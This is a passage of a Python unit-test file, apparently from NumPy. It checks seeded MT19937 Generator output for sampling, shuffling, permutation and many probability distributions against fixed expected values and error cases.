actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.0969992 , 0.70751746],
[0.08436483, 0.76773121],
[0.66506902, 0.71548719]])
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random = Generator(MT19937(self.seed))
actual = random.random(dtype=np.float32)
desired = 0.0969992
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype='int32')
def test_choice_uniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4)
desired = np.array([0, 0, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([0, 1, 0, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False)
desired = np.array([2, 0, 3], dtype=np.int64)
assert_array_equal(actual, desired)
actual = random.choice(4, 4, replace=False, shuffle=False)
desired = np.arange(4, dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([0, 2, 3], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random = Generator(MT19937(self.seed))
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['a', 'a', 'c', 'c'])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[0, 1], [0, 1], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[0], [2], [4], [6]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random = Generator(MT19937(self.seed))
non_contig = random.choice(5, 3, p=p[::2])
random = Generator(MT19937(self.seed))
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
random = Generator(MT19937(self.seed))
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != 'little':
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert_(choice_hash == res)
def test_bytes(self):
random = Generator(MT19937(self.seed))
actual = random.bytes(10)
desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random = Generator(MT19937(self.seed))
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=1)
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=-1)
assert_array_equal(actual, desired)
def test_shuffle_axis_nonsquare(self):
y1 = np.arange(20).reshape(2, 10)
y2 = y1.copy()
random = Generator(MT19937(self.seed))
random.shuffle(y1, axis=1)
random = Generator(MT19937(self.seed))
random.shuffle(y2.T)
assert_array_equal(y1, y2)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_shuffle_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.shuffle, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.shuffle, arr, 3)
assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
arr = [[1, 2, 3], [4, 5, 6]]
assert_raises(NotImplementedError, random.shuffle, arr, 1)
def test_permutation(self):
random = Generator(MT19937(self.seed))
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
bad_x_str = "abcd"
assert_raises(np.AxisError, random.permutation, bad_x_str)
bad_x_float = 1.2
assert_raises(np.AxisError, random.permutation, bad_x_float)
random = Generator(MT19937(self.seed))
integer_val = 10
desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_permutation_custom_axis(self):
a = np.arange(16).reshape((4, 4))
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=1)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=-1)
assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[42, 41],
[42, 48],
[44, 50]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456)
desired = 42
assert_array_equal(actual, desired)
def test_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[32.9850547060149, 39.0219480493301],
[56.2006134779419, 57.3474165711485],
[55.4243733880198, 55.4209797925213]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.5439892869558927, 0.45601071304410745],
[0.5588917345860708, 0.4411082654139292 ]],
[[0.5632074165063435, 0.43679258349365657],
[0.54862581112627, 0.45137418887373015]],
[[0.49961831357047226, 0.5003816864295278 ],
[0.52374806183482, 0.47625193816517997]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random = Generator(MT19937(self.seed))
non_contig = random.dirichlet(alpha, size=(3, 2))
random = Generator(MT19937(self.seed))
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_dirichlet_small_alpha(self):
eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
alpha = eps * np.array([1., 1.0e-3])
random = Generator(MT19937(self.seed))
actual = random.dirichlet(alpha, size=(3, 2))
expected = np.array([
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]]
])
assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
# Use alpha.max() < 0.1 to trigger stick breaking code path
alpha = np.array([0.02, 0.04, 0.03])
exact_mean = alpha / alpha.sum()
random = Generator(MT19937(self.seed))
sample = random.dirichlet(alpha, size=20000000)
sample_mean = sample.mean(axis=0)
assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[0.098845481066258, 1.560752510746964],
[0.075730916041636, 1.769098974710777],
[1.488602544592235, 2.49684815275751 ]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random = Generator(MT19937(self.seed))
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[0.461720027077085, 1.100441958872451],
[1.100337455217484, 0.91421736740018 ],
[0.500811891303113, 0.826802454552058]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
[18.73983605132985, 19.57961681699238],
[18.17897755150825, 18.17653912505234]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random = Generator(MT19937(self.seed))
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[ 1, 10],
[ 1, 12],
[ 9, 10]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random = Generator(MT19937(self.seed))
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[ 4.688397515056245, -0.289514845417841],
[ 4.981176042584683, -0.633224272589149],
[-0.055915275687488, -0.333962478257953]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[ 9, 9],
[ 9, 9],
[10, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random = Generator(MT19937(self.seed))
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.156353949272393, 1.195863024830054],
[-3.435458081645966, 1.656882398925444],
[ 0.924824032467446, 1.251116432209336]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random = Generator(MT19937(self.seed))
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-4.338584631510999, 1.890171436749954],
[-4.64547787337966 , 2.514545562919217],
[ 1.495389489198666, 1.967827627577474]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[ 0.0268252166335, 13.9534486483053],
[ 0.1204014788936, 2.2422077497792],
[ 4.2484199496128, 12.0093343977523]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random = Generator(MT19937(self.seed))
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[14, 17],
[3, 18],
[5, 1]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[1, 5, 1, 6, 4, 3],
[4, 2, 6, 2, 4, 2]],
[[5, 3, 2, 6, 3, 1],
[4, 4, 0, 2, 3, 7]],
[[6, 3, 1, 5, 3, 2],
[5, 5, 3, 1, 2, 4]]])
assert_array_equal(actual, desired)
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal(self, method):
random = Generator(MT19937(self.seed))
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size, method=method)
desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
[-0.9967333370066214, 10.342002097029821 ]],
[[ 0.7850019631242964, 11.181113712443013 ],
[ 0.8901349653255224, 8.873825399642492 ]],
[[ 0.7130260107430003, 9.551628690083056 ],
[ 0.7127098726541128, 11.991709234143173 ]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov, method=method)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non-symmetric covariance input raises an exception when
# check_valid='raise' is used with the default svd method.
mean = [0, 0]
cov = [[1, 2], [1, 2]]
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
method='eigh')
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises a ValueError when check_valid='raise'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise', method='eigh')
# check degenerate samples from singular covariance matrix
cov = [[1, 1], [1, 1]]
if method in ('svd', 'eigh'):
samples = random.multivariate_normal(mean, cov, size=(3, 2),
method=method)
assert_array_almost_equal(samples[..., 0], samples[..., 1],
decimal=6)
else:
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov, method=method)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
random = Generator(MT19937(self.seed))
n_s = 1000
mean = np.array([1, 2])
cov = np.array([[2, 1], [1, 2]])
s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
s_center = s - mean
cov_emp = (s_center.T @ s_center) / (n_s - 1)
# these are pretty loose and are only designed to detect major errors
assert np.all(np.abs(s_center.mean(-2)) < 0.1)
assert np.all(np.abs(cov_emp - cov) < 0.2)
def test_negative_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[543, 727],
[775, 760],
[600, 674]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_negative_binomial_p0_exception(self):
# Verify that p=0 raises an exception.
with assert_raises(ValueError):
x = random.negative_binomial(1, 0)
def test_noncentral_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[ 1.70561552362133, 15.97378184942111],
[13.71483425173724, 20.17859633310629],
[11.3615477156643 , 3.67891108738029]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
[1.14554372041263e+00, 1.38187755933435e-03],
[1.90659181905387e+00, 1.21772577941822e+00]])
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[0.82947954590419, 1.80139670767078],
[6.58720057417794, 7.00491463609814],
[6.31101879073157, 6.30982307753005]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.060310671139 , 0.23866058175939],
[0.86860246709073, 0.2668510459738 ],
[0.23375780078364, 1.88922102885943]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random = Generator(MT19937(self.seed))
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.618412914693162, 2.635726692647081],
[-2.116923463013243, 0.807460983059643],
[ 1.446547137248593, 2.485684213886024]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random = Generator(MT19937(self.seed))
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
[7.2640150889064703e-01, 3.4650454783825594e+05],
[4.5852344481994740e+04, 6.5851383009539105e+07]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random = Generator(MT19937(self.seed))
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[0, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('int64').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random = Generator(MT19937(self.seed))
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
[2.482442984543471e-10, 1.527108843266079e-01],
[8.188283434244285e-02, 3.950547209346948e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
[ 4.19850651287094, 17.08718809823704],
[14.7907457708776 , 15.85545333419775]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random = Generator(MT19937(self.seed))
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[-1.489437778266206, -3.275389641569784],
[ 0.560102864910406, -0.680780916282552],
[-1.314912905226277, 0.295852965660225]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.standard_exponential(size=(3, 2), method='inv')
desired = np.array([[0.102031839440643, 1.229350298474972],
[0.088137284693098, 1.459859985522667],
[1.093830802293668, 1.256977002164613]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62970724056362, 1.22379851271008],
[3.899412530884 , 4.12479964250139],
[3.74994102464584, 3.74929307690815]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_scalar_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(3, dtype=np.float32)
desired = 2.9242148399353027
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62971, 1.2238 ],
[3.89941, 4.1248 ],
[3.74994, 3.74929]])
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array([[10.14987, 7.87012],
[ 9.46284, 12.56832],
[13.82495, 7.81533]], dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.,
dtype='int32')
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random = Generator(MT19937(self.seed))
actual = random.standard_normal(size=(3, 2))
desired = np.array([[-1.870934851846581, 1.25613495182354 ],
[-1.120190126006621, 0.342002097029821],
[ 0.661545174124296, 1.181113712443012]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random = Generator(MT19937(self.seed))
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[-1.484666193042647, 0.30597891831161 ],
[ 1.056684299648085, -0.407312602088507],
[ 0.130704414281157, -2.038053410490321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random = Generator(MT19937(self.seed))
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
[ 7.68152445215983, 14.36169131136546],
[13.16105603911429, 13.72341621856971]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random = Generator(MT19937(self.seed))
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[2.13306255040998 , 7.816987531021207],
[2.015436610109887, 8.377577533009589],
[7.421792588856135, 7.891185744455209]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
